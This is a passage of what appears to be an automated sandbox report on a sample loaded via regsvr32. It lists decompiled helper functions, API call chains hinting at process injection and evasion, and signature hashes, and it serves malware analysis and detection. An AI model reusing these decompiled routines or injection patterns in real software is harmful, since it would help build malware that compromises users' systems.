                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: d06ee571076a162d5dc893a3ca68c6585c5f08ebdf04f643824037c3e31a21ca
                • Instruction ID: f0505bd347bdca5f5e7b4e41efadbee7f09c49926527159d2175d94976b19cc4
                • Opcode Fuzzy Hash: d06ee571076a162d5dc893a3ca68c6585c5f08ebdf04f643824037c3e31a21ca
                • Instruction Fuzzy Hash: 20E0DF78248300AFEB28FFB09C0970A36A8FF4CB40F144824E78DE9084EB74C080AA31
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD4428: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 04BD4461
                  • Part of subcall function 04BD4428: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BD4497
                  • Part of subcall function 04BD4428: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BD44A3
                  • Part of subcall function 04BD4428: lstrcmpi.KERNEL32(?,00000000), ref: 04BD44E0
                  • Part of subcall function 04BD4428: StrChrA.SHLWAPI(?,0000002E), ref: 04BD44E9
                  • Part of subcall function 04BD4428: lstrcmpi.KERNEL32(?,00000000), ref: 04BD44FB
                  • Part of subcall function 04BD4428: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BD454C
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,04BEA5C0,0000002C,04BC5FC8,06248E36,?,00000000,04BC3B4C), ref: 04BC9566
                  • Part of subcall function 04BCB45A: GetProcAddress.KERNEL32(?,00000000), ref: 04BCB483
                  • Part of subcall function 04BCB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BCE55E,00000000,00000000,00000028,00000100), ref: 04BCB4A5
                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BEA5C0,0000002C,04BC5FC8,06248E36,?,00000000,04BC3B4C,?,00000318), ref: 04BC95F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                • String ID:
                • API String ID: 4138075514-0
                • Opcode ID: 7fe229138f21d47e82639f72a72454fce7f16934dc6a22ae22ea54bbd460c4e8
                • Instruction ID: c03038dcd257d21c9e420e1d1590880975f51b4cd383c5a0341045f817ee5407
                • Opcode Fuzzy Hash: 7fe229138f21d47e82639f72a72454fce7f16934dc6a22ae22ea54bbd460c4e8
                • Instruction Fuzzy Hash: 09210271D01229ABDF519FA5DC80ADEBFB4FF48724F10816AE914B6250D334AA41CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 32%
                			E031F4EFA(intOrPtr _a4, signed int _a8) {
                				long _v8;
                				long _v12;
                				char _v16;
                				void* _t14;
                				long _t15;
                				char* _t17;
                				intOrPtr* _t19;
                				signed int _t22;
                
                				_t19 = __imp__; // 0x6f99e700
                				_t22 =  ~_a8;
                				_v12 = 0;
                				asm("sbb esi, esi");
                				while(1) {
                					_v8 = 0;
                					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                					if(_t14 != 0) {
                						break;
                					}
                					_t15 = GetLastError();
                					_v8 = _t15;
                					if(_t15 != 0x2f8f) {
                						if(_t15 == 0x2f00) {
                							continue;
                						}
                					} else {
                						_v16 = 0x3300;
                						if(_v12 == 0) {
                							_t17 =  &_v16;
                							__imp__(_a4, 0x1f, _t17, 4);
                							if(_t17 == 0) {
                								_v8 = GetLastError();
                							} else {
                								_v12 = 1;
                								continue;
                							}
                						}
                					}
                					L9:
                					return _v8;
                				}
                				goto L9;
                			}

                APIs
                • GetLastError.KERNEL32 ref: 031F4F17
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,031F76DB,00000000,?,?), ref: 031F4F6E
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: 34e0c8a97e708d79294c3638a6597767d46d45fe5b3f620743e9c83d5f16f40e
                • Instruction ID: badfe7ba2e56d5a0f55c386f02d1b855f0a0f06b29efc8458f233ebc43c05347
                • Opcode Fuzzy Hash: 34e0c8a97e708d79294c3638a6597767d46d45fe5b3f620743e9c83d5f16f40e
                • Instruction Fuzzy Hash: A7011E75900109FFDF14EF9AD848AAFBBBCEB89750F108066EA19D2144CB709684CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F,00000001,?,00000000), ref: 04BCB4CA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 37991e01552d67a18f47d3b9148c7bcd3e7fdcc5d24b538bc638a9b8de7cff8b
                • Instruction ID: d1354a3ddd80f80a229460586fce631eadaa229637d6906dc6c3e9d126bb20cb
                • Opcode Fuzzy Hash: 37991e01552d67a18f47d3b9148c7bcd3e7fdcc5d24b538bc638a9b8de7cff8b
                • Instruction Fuzzy Hash: 90314A72A04219EFDB10DF99E8929ADB7B5FB84314B5540EED604AB200D330FE41CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E031F134A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                				signed int _v5;
                				signed int _v12;
                				void* _t32;
                				signed int _t37;
                				signed int _t39;
                				signed char _t45;
                				void* _t49;
                				char* _t51;
                				signed int _t65;
                				signed int _t66;
                				signed int _t69;
                
                				_v12 = _v12 & 0x00000000;
                				_t69 = __eax;
                				_t32 = RtlAllocateHeap( *0x31fa290, 0, __eax << 2); // executed
                				_t49 = _t32;
                				if(_t49 == 0) {
                					_v12 = 8;
                				} else {
                					 *_a8 = _t49;
                					do {
                						_t45 =  *_a4;
                						asm("cdq");
                						_t65 = 0x64;
                						_t37 = (_t45 & 0x000000ff) / _t65;
                						_v5 = _t37;
                						if(_t37 != 0) {
                							 *_t49 = _t37 + 0x30;
                							_t49 = _t49 + 1;
                							_t45 = _t45 + _t37 * 0x9c;
                						}
                						asm("cdq");
                						_t66 = 0xa;
                						_t39 = (_t45 & 0x000000ff) / _t66;
                						if(_t39 != 0 || _v5 != _t39) {
                							 *_t49 = _t39 + 0x30;
                							_t49 = _t49 + 1;
                							_t45 = _t45 + _t39 * 0xf6;
                						}
                						_a4 = _a4 + 1;
                						 *_t49 = _t45 + 0x30;
                						 *(_t49 + 1) = 0x2c;
                						_t49 = _t49 + 2;
                						_t69 = _t69 - 1;
                					} while (_t69 != 0);
                					_t51 = _t49 - 1;
                					 *_a12 = _t51 -  *_a8;
                					 *_t51 = 0;
                				}
                				return _v12;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 031F1362
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e7c49944922e8b9e5234617a86aedc78fc14341eac7e70251164b20db5b9e542
                • Instruction ID: 86c3adbf5af5d78b65a75166f5c800c7859addf70d2efd2b9687b82bf668c586
                • Opcode Fuzzy Hash: e7c49944922e8b9e5234617a86aedc78fc14341eac7e70251164b20db5b9e542
                • Instruction Fuzzy Hash: FE11D631245345EFEB09CF29C451BED7BA9DF5B368F18409AE5409B692C277850BC760
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(?,00000003,04BED514,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BCB722
                  • Part of subcall function 04BDD6E3: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04BEE480), ref: 04BDD6FA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleInformationModuleProcessQuery
                • String ID:
                • API String ID: 2776635927-0
                • Opcode ID: ba883b4d0cf2e0f744b23a741b6eda0125f4bf05e9382b6fe91cbdcfd147f694
                • Instruction ID: c57f161e3a49707a4c301a3e61e07d6a8d1759deb87263228290e81c70dc7304
                • Opcode Fuzzy Hash: ba883b4d0cf2e0f744b23a741b6eda0125f4bf05e9382b6fe91cbdcfd147f694
                • Instruction Fuzzy Hash: ED219076644205AFDB25CF99E8C2D6E77A9EF443A472444AFEC45DB110E631F900CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04BC385D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: e3b75c7a444d84637bd251315c7a164b43bcca1fd0450f2e3b14fa45b98ffb7e
                • Instruction ID: e61d7480f3295b6f767c23a6b9937a0def37b0d0bc41746ac76628252f4db55b
                • Opcode Fuzzy Hash: e3b75c7a444d84637bd251315c7a164b43bcca1fd0450f2e3b14fa45b98ffb7e
                • Instruction Fuzzy Hash: 55111E32200209AFDF018FA9DC809DA7BA9FF48374B058169FD1996160C735E921DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E031F167E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v12;
                				void* _v18;
                				short _v20;
                				intOrPtr _t15;
                				short _t17;
                				intOrPtr _t19;
                				short _t23;
                
                				_t23 = 0;
                				_v20 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t15 =  *0x31fa2d8; // 0x240d5a8
                				_t4 = _t15 + 0x31fb39c; // 0x5608944
                				_t20 = _t4;
                				_t6 = _t15 + 0x31fb124; // 0x650047
                				_t17 = E031F51C7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                				if(_t17 < 0) {
                					_t23 = _t17;
                				} else {
                					if(_v20 != 8) {
                						_t23 = 1;
                					} else {
                						_t19 = E031F2E50(_t20, _v12);
                						if(_t19 == 0) {
                							_t23 = 8;
                						} else {
                							 *_a16 = _t19;
                						}
                						__imp__#6(_v12);
                					}
                				}
                				return _t23;
                			}

                APIs
                  • Part of subcall function 031F51C7: SysFreeString.OLEAUT32(?), ref: 031F52A6
                  • Part of subcall function 031F2E50: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,031F6B5B,004F0053,00000000,?), ref: 031F2E59
                  • Part of subcall function 031F2E50: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,031F6B5B,004F0053,00000000,?), ref: 031F2E83
                  • Part of subcall function 031F2E50: memset.NTDLL ref: 031F2E97
                • SysFreeString.OLEAUT32(00000000), ref: 031F16E4
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: b082491b6879ab38d4c04496c76eb618894e5caea6676124b2ece59aaa067bf3
                • Instruction ID: 51756a30266fa3af58226045809169127f25a501053272d74d561175fbddf205
                • Opcode Fuzzy Hash: b082491b6879ab38d4c04496c76eb618894e5caea6676124b2ece59aaa067bf3
                • Instruction Fuzzy Hash: 97019E35504128FFCF10EBA8CC04DAEBBB9FB0C720F444525EA01E6020E3B099A68B90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCFDC6: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDE5
                  • Part of subcall function 04BCFDC6: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDF0
                  • Part of subcall function 04BCFDC6: _wcsupr.NTDLL ref: 04BCFDFD
                  • Part of subcall function 04BCFDC6: lstrlenW.KERNEL32(00000000), ref: 04BCFE05
                • ResumeThread.KERNEL32(00000004,?,04BC3875,?), ref: 04BC6567
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                • String ID:
                • API String ID: 3646851950-0
                • Opcode ID: a82731d1ae434646a2b978fe6d1836d9ebaf98c600f57878732b586c362a4a28
                • Instruction ID: aebbab4d4e70a7b4225b2b887262e0e3dddd89d01e84c45b0edd6b268b68a255
                • Opcode Fuzzy Hash: a82731d1ae434646a2b978fe6d1836d9ebaf98c600f57878732b586c362a4a28
                • Instruction Fuzzy Hash: 3FD05E30A44306A6EB316B21CD84F16BFA39FA0A54F1085DCF9C855068D772F810A625
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 04BE65A6
                  • Part of subcall function 04BE66EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A5BC,04BC0000), ref: 04BE6768
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 56bde953d5f8c1c40fd08f3ac811fd7845840093429552dd00d2fea61522f0b6
                • Instruction ID: 726ed4a4917c3761f2e7653a818503385a78b595d9d2e9ebca13eacb119fceda
                • Opcode Fuzzy Hash: 56bde953d5f8c1c40fd08f3ac811fd7845840093429552dd00d2fea61522f0b6
                • Instruction Fuzzy Hash: 82A001D63B9106BF32086263AD16C7B179CC8E8A653B0A99AE42294054AA90B9552D35
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 04BE65A6
                  • Part of subcall function 04BE66EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A5BC,04BC0000), ref: 04BE6768
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 0cc0da6cba25d0a5a1adf47fa09bc7c39eccfcfb1d208160f69088ace29492b7
                • Instruction ID: 0f26c0b4fe25bb8f1a799da5001179ba0ca3dfa97f532bb817cefd5e099142bc
                • Opcode Fuzzy Hash: 0cc0da6cba25d0a5a1adf47fa09bc7c39eccfcfb1d208160f69088ace29492b7
                • Instruction Fuzzy Hash: 98A012C13741057F310411135D01C37034CC4E4910370A089F010900006A4079001C30
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: ec8939f58ac77cb3049e30e696d014ee16862986ed7b85e8184f862beb1b9947
                • Instruction ID: 6fa404e4d5814420f539d6d5dac01d89e2d988d593f4a81cfc60c60d10415159
                • Opcode Fuzzy Hash: ec8939f58ac77cb3049e30e696d014ee16862986ed7b85e8184f862beb1b9947
                • Instruction Fuzzy Hash: F2B01231000200ABDA11DB21ED05F067B21E7D0700F004422B2089A061C3355C64EB34
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 21c5181a4ca945398a9e7c0a4bb707d82a03ae4049275382920862d3069f7f67
                • Instruction ID: ee53a5347e35d6af1d72497b428b267cb5e7313e08048032e0cb803f27a4d463
                • Opcode Fuzzy Hash: 21c5181a4ca945398a9e7c0a4bb707d82a03ae4049275382920862d3069f7f67
                • Instruction Fuzzy Hash: 11B01231040200EFDA019B21DD05F057A21F7D0700F104022B2045B461C2354C20FB34
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F2114(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x31fa290, 0, _a4); // executed
                				return _t2;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 0cf721cb384ca095c9950fc29dbcc0405a24e0e1e595d1e6b5202cc55bcfd920
                • Instruction ID: 0b5d6607704594be5d5491870c1a243debaf49adf9e1220cb71b0f8854138582
                • Opcode Fuzzy Hash: 0cf721cb384ca095c9950fc29dbcc0405a24e0e1e595d1e6b5202cc55bcfd920
                • Instruction Fuzzy Hash: BEB01231114100AFCB067B00DD04F067B32FB5CB40F104010B20940068C3328470FF28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F24F7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                				void* _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				char _v144;
                				int _v148;
                				intOrPtr _v152;
                				intOrPtr _v156;
                				intOrPtr _v160;
                				char _v164;
                				void* _t37;
                				void* _t42;
                				void* _t51;
                				int _t53;
                				void* _t60;
                				void* _t63;
                				void* _t64;
                
                				_t53 = 0;
                				_t60 = __ecx;
                				_v16 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                					L21:
                					return _t53;
                				} else {
                					_t58 =  &_v164;
                					_t37 = E031F2B0C(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                					if(_t37 != 0) {
                						goto L21;
                					}
                					_t61 = _t60 - 0x80;
                					if(_v148 > _t60 - 0x80) {
                						goto L21;
                					}
                					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                						_t37 = _t37 + 1;
                						if(_t37 < 0x10) {
                							continue;
                						}
                						_t53 = _v148;
                						_t51 = E031F2114(_t53);
                						_t73 = _t51;
                						_v8 = _t51;
                						if(_t51 != 0) {
                							_t53 = 0;
                							L18:
                							if(_t53 != 0) {
                								goto L21;
                							}
                							L19:
                							if(_v8 != 0) {
                								E031F2C11(_v8);
                							}
                							goto L21;
                						}
                						memcpy(_t51, _a4, _t53);
                						L8:
                						_t63 = _v8;
                						E031F5374(_t58, _t73, _t63, _t53,  &_v32);
                						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                							L15:
                							_t53 = 0;
                							goto L19;
                						} else {
                							 *_a8 = _t63;
                							goto L18;
                						}
                					}
                					_t58 =  &_v144;
                					_t42 = E031F78F2(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                					__eflags = _t42;
                					if(_t42 != 0) {
                						_t53 = _v12;
                						goto L18;
                					}
                					_t53 = _v148;
                					__eflags = _v12 - _t53;
                					if(__eflags >= 0) {
                						goto L8;
                					}
                					goto L15;
                				}
                			}

                APIs
                • memcpy.NTDLL(00000000,?,?,?,?,031F7307,00000001,?,?,031F7307), ref: 031F257E
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction ID: ad00dfd5e4dd20a81d8fa5c2cf77029f8d81bc97392d3876ce44a16673cbbde4
                • Opcode Fuzzy Hash: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction Fuzzy Hash: D1316F79900219AFDF14DEA8C990EEDB3B8AB08314F1448E9EB15A7150D7309E86DF20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,74E5F710,00000000,00000000,?,?,?,04BD2C46,?), ref: 04BDC443
                  • Part of subcall function 04BC57A1: memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,04BDC3FA,?,00000001,?,?,?,?), ref: 04BC57C4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreememcpy
                • String ID:
                • API String ID: 1301464996-0
                • Opcode ID: 21a6d29f9a83ee92f931b7525dd5f5f52fab1f2d824f98dcd3f1ec68dc0a5f15
                • Instruction ID: 963a78d6ad13dd3681983942d20005d9207d90f4f84d0ff07b061330b68f9c61
                • Opcode Fuzzy Hash: 21a6d29f9a83ee92f931b7525dd5f5f52fab1f2d824f98dcd3f1ec68dc0a5f15
                • Instruction Fuzzy Hash: 82118C75694201EBDB149F5DDC90EBE7BB8EB88204F5000EAF5029B241E674BD01DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,04BEE3A4,00000018,04BCAA0D,06248E36,?,04BCAA0D,06248E36,?,04BCAA0D,06248E36,?,?,?,?,04BCAA0D), ref: 04BD0BAB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: b3943cc5aa34e189a9fc1313a29f40805fba43c02e14cace0e67be61af089916
                • Instruction ID: 92d3921a955ffb3dbcb5af328ad61f422e9501ddbb455adc8cc3a6f32c980a92
                • Opcode Fuzzy Hash: b3943cc5aa34e189a9fc1313a29f40805fba43c02e14cace0e67be61af089916
                • Instruction Fuzzy Hash: 7F116A71604209AFEB11EF1AE945C663BA5EBC0718F0481ABE40D8F2A1E734FC04CB71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,04BEE21C,?,00000000,?,?,?,00000000,04BD4935,04BE3A35,00000000,00000000), ref: 04BC9D96
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(04BEE21C,0000002E,00000000,00000000,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFF9D
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(00000004,00000020,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFFAC
                  • Part of subcall function 04BE0929: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,04BD47CC,?,00000001), ref: 04BE094F
                  • Part of subcall function 04BE0929: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04BE095B
